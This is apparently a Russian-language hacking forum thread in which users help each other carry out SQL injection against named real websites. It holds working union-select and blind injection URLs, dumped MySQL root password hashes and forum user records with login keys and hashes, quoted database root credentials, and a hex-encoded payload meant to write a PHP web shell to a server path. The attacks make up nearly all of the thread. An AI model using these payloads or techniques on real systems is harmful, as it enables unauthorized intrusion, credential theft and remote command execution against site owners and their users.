По-моему, ты ошибся. При всех запросах выводится одно и то же. Поищи скулю в "поиске" =) Code: 111' union select 1,2,3,4,5 from email limit 950,1/*
Собствено такой вопрос Sql выдает пароль, и логин но в админку незаходит. вот пример: А вот сама админка: Собствено что можно зделать?
Возможно стоит блок по ай-пи. То есть в админку может заходить только с ай-пи 75.125.150.120 - к примеру.
Здрастье =) у меня вопрос: +select+1,2,3,4,5,6,7,8,9/* Вот скуля,принтабельное поле - 7 J\Очень интересно выводиться версия,можно ли вывести данные кроме version()??? Заранее спасибо
скорее всего нет,я думаю,там стоит ограничение по типу данных и по длине... а у меня такой вопрос: почему не проходит конструкция ? 0x3c3f2073797374656d28245f4745545b27636d64275d293b203f3e - <? system($_GET['cmd']); ?> 0x2f7661722f7777772f666f72756d2f7368656c6c2e706870 - установочная дирректория /var/www/forum/shell.php
В Into Outfile нельзя использовать Hex значения, только коквычки Гы гы, connect.php Code: <? $Host = "localhost"; $User = "root"; $Password = "123456"; $Database_name = "forum"; $Link = mysql_connect ($Host, $User, $Password) or die(mysql_error()); mysql_select_db($Database_name,$Link) or die(mysql_error()); ?> Мощный пароль на рута
Code: http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysql.users/* повидимому вслепую видно что ето версия 4.1.x да и Code: SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'users нет доступа на чтение..
Почему же четвертая? Если выводиться,что пятая? Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ
Code: http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(concat(version(),char(58),user()))),6,7,8,9/* Кстати там ещё таблица users есть.
K1nD[e]R,DDoSька Версия 5 полей с выводом нет(в этом месте), цифра которая выводится(активируется) это не вывод, но её можно использовать как индикацию true Тоесть: http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=3 цифра не активна false http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=4 цифра не активна false http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=5 цифра зажглась true Или ищи вывод в другом месте, или подзапросы
Вот мой не похек (((( помогите пожалуйстА! http://football.kapook.com/webboard_view_guest.php?qid='4595 http://mrdriver.com/device.php?id=33714' http://driversdb.com/device.php?id=107971' 2 последних..вообще как одинаковые...
DDoSька http://football.kapook.com/team.php?id=13%27+union+select+1,2,3,4,5,6,7,concat(0x3a,user,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/* :root:612382396d951d43 http://mrdriver.com/device.php?id=-33714%27+union+select+version()/* 5.0.24-standard Не будем перебирать все таблицы и посмотрим на сайт. Стоит форум mybb пробуем табл mybb_users http://mrdriver.com/device.php?id=-33714%27+union+select+concat(uid,0x3a,loginkey,0x3a,password,0x3a,email,0x3a,icq)+from+mybb_users+limit+0,1/* 1:sekysvwGmEE5uCfSHMKdK1uAUdrykTa6XkwLbNSnsxli1Q2D7h:24a1de6ebae6c9497fac8e1c328d8fa2:[email protected]: Всё зашифровал))) гад. http://driversdb.com/device.php?id=-107971%27+union+select+concat(uid,0x3a,loginkey,0x3a,password,0x3a,email,0x3a,icq)+from+mybb_users+limit+0,1/* 1:7T6Jlse4WHMFWtJax9OsOVgLqmWoufnlzPDkCtHGFleS9YZmW4:e7cf5c7cf184622332e2bc347a38659a:[email protected]:
